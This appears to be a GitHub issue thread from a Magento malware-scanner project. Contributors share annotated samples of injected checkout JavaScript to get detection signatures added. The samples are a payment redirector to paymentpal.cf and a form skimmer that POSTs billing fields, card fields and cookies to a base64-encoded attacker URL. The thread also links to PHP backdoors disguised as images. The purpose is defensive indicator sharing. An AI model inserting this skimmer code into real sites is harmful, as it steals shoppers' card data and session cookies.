
Malware that changes the checkout payment URL so the payment is redirected to the attacker's PayPal account


The following code had been injected into some of the store's JavaScript files — in our case quickview.js and ccard.js:


// Sample 1 (quickview.js / ccard.js): onload hook of the checkout hijacker.
// `userpayid` is the malware's own marker cookie (set by paynow_right()
// below); the hooks are armed only in browsers that do not carry it yet, so
// a victim is diverted at most once per browser — which also makes the
// behaviour hard to reproduce when re-testing a reported store.
jQuery(document).ready(function()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		// The inline onclick handlers of the "save" / "place order" controls
		// are REPLACED, not wrapped, with paynow_right(), so the legitimate
		// shippingMethod.save() / checkout.save() / payment.save() never runs.
		// #checkout-onepage-* belongs to Magento's onepage checkout; the
		// #onestepcheckout-* ids presumably target OneStepCheckout-style
		// extensions — verify against the affected store's theme.
		jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");
		jQuery("#checkout-onepage-buttom").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-button-place-order").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-place-order").attr("onclick", "paynow_right();");
	}
});

// Sample 1: the substituted click handler. Fires once per browser (guarded by
// the same `userpayid` marker cookie), then sends the shopper off-site instead
// of submitting the order.
function paynow_right()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		// Random marker value; only the cookie's presence matters, not its content.
		var rand = function()
		{
			return Math.random().toString(36).substr(2);
		};
		document.cookie = "userpayid=" + rand();
		// Payload handed to the attacker: which store the victim came from and
		// the payment "method" to imitate. No cart or card data is sent here —
		// this variant diverts the payment rather than skimming the form.
		var arr = {
			"location" : "http://" + location.host,
			"method" : "PayPal"
		};
		// Protocol-relative redirect to the attacker-controlled host
		// paymentpal.cf (presumably chosen to pass as PayPal); the store
		// identity rides along base64-encoded in the query string.
		// IOC: the domain paymentpal.cf in the clear.
		jQuery(location).attr('href', "//paymentpal.cf/?payment=" + btoa(JSON.stringify(arr)));
	}
}

quickview.js => https://pastebin.com/xUgXxwDe ccard.js => https://pastebin.com/tkGgKQSi

We also found two files with suspicious names — PHP files with an image extension appended, a common disguise for dropped PHP backdoors (their contents are in the pastes linked below):

  • 2.php.png => https://pastebin.com/RC4v6UrX
  • slltemap.php.jpg => https://pastebin.com/0q3naCgZ

— jigneshthummar, Sep 19 '17 20:09

Thanks, added signatures in #150

— gwillem, Sep 25 '17 20:09

@gwillem

On one of our production sites I found a new version of the same malware. This time the exfiltration URL is base64-encoded and only decoded at runtime with atob(), so a signature that matches on the plain-text paymentpal.cf domain will not pick it up; the base64 literal itself, the checkbillpa function name and the userpayid cookie marker are constant strings that appear in this variant and could be matched instead.

New code:

// Sample 2 (Apr 2018 variant): onload hook. The `userpayid` marker cookie is
// still set, but here it no longer gates the hooks — they are installed on
// every page load, so every checkout is skimmed. Instead of replacing the
// onclick handlers, checkbillpa() is PREPENDED and the original
// billing.save() / payment.save() / checkout.save() / oscPlaceOrder() call is
// kept, so the order still goes through and the store sees nothing wrong.
// NOTE(review): the backslashes escaping the inner quotes of the selectors
// were lost when this was pasted into the issue (compare the intact
// `*[name^=\"payment\"]` selector further down), so this line is not valid
// JavaScript as shown; the pasted ids/selectors are otherwise the IOCs.
jQuery(document).ready(function() { if(!(document.cookie.indexOf("userpayid") + 1)) { var rand = function() { return Math.random().toString(36).substr(2); }; document.cookie = "userpayid=" + rand(); } jQuery("[onclick="billing.save()"]").attr("onclick", "checkbillpa("bill");billing.save();"); jQuery("[onclick="payment.save()"]").attr("onclick", "checkbillpa("card");payment.save();"); jQuery("[onclick="checkout.save(); return false;"]").attr("onclick", "checkbillpa("all");checkout.save();return false;"); jQuery("#checkout-onepage-buttom").attr("onclick", "checkbillpa("all");"); jQuery("#onestepcheckout-place-order").attr("onclick", "checkbillpa("all");"); jQuery(".opc-btn-checkout").attr("onclick", "checkbillpa("all");"); jQuery(".onestepcheckout-btn-checkout").attr("onclick", "checkbillpa("all");"); jQuery("[onclick="oscPlaceOrder(this)"]").attr("onclick", "checkbillpa("bill");oscPlaceOrder(this);"); });

// Sample 2: the form grabber called from the hooked checkout buttons.
// `text` selects what to harvest: "bill" (billing step), "card" (payment
// step) or "all" (both; used on the final place-order buttons).
// The exfiltration URL is hidden as a base64 literal so a plain-text search
// for the domain finds nothing; atob() of it yields
// //request.paymentpal.cf/checkpayment.php — the same paymentpal.cf
// infrastructure as the Sept 2017 sample. IOCs: that base64 string, the host
// request.paymentpal.cf, the function name checkbillpa.
// `billing` and `payment` are not defined in the sample; presumably they are
// Magento's global onepage-checkout objects from opcheckout.js — verify. The
// skimmer writes the form field values into them (billing[...] only where the
// property is empty/undefined, payment[...] unconditionally) and then
// serialises the whole object, so every input whose name starts with
// "billing" / "payment" ends up in the POST body.
// NOTE(review): as with the hook above, the inner quotes of the
// `*[name^="billing"]` selector lost their backslashes in the paste.
function checkbillpa(text) { var urlcheck = atob("Ly9yZXF1ZXN0LnBheW1lbnRwYWwuY2YvY2hlY2twYXltZW50LnBocA=="); if(text == "bill" || text == "all") { jQuery("*[name^="billing"]").each(function() { if(billing[this.name] == "" || billing[this.name] == "undefined" || typeof billing[this.name] === "undefined") billing[this.name] = this.value; });

	// Fire-and-forget POST (no callbacks, response never read). With jQuery's
	// default form-encoded content type this is a "simple" cross-origin
	// request, so the browser sends it without a CORS preflight regardless of
	// the attacker host's response headers. Besides the billing data and the
	// store host, `valid` carries the victim's entire document.cookie — i.e.
	// every cookie the store set that is readable from script.
	jQuery.ajax({url:urlcheck, type:"POST", data:"billing="+encodeURIComponent(JSON.stringify(billing))+"&target="+location.host+"&valid="+encodeURIComponent(document.cookie)});
}
if(text == "card" || text == "all")
{
	// Harvests every input whose name starts with "payment" — in a Magento
	// onepage checkout this presumably includes the card number, expiry and
	// CVV fields (payment[cc_number], payment[cc_cid], ...) — verify against
	// the store's payment form.
	jQuery("*[name^=\"payment\"]").each(function()
	{
		payment[this.name] = this.value;
	});

	// Same exfiltration channel as the billing branch, with the serialised
	// payment object and, again, the full document.cookie.
	jQuery.ajax({url:urlcheck, type:"POST", data:"payment="+encodeURIComponent(JSON.stringify(payment))+"&target="+location.host+"&valid="+encodeURIComponent(document.cookie)});
}

}

Please add to signatures.

— kesarweb, Apr 12 '18 22:04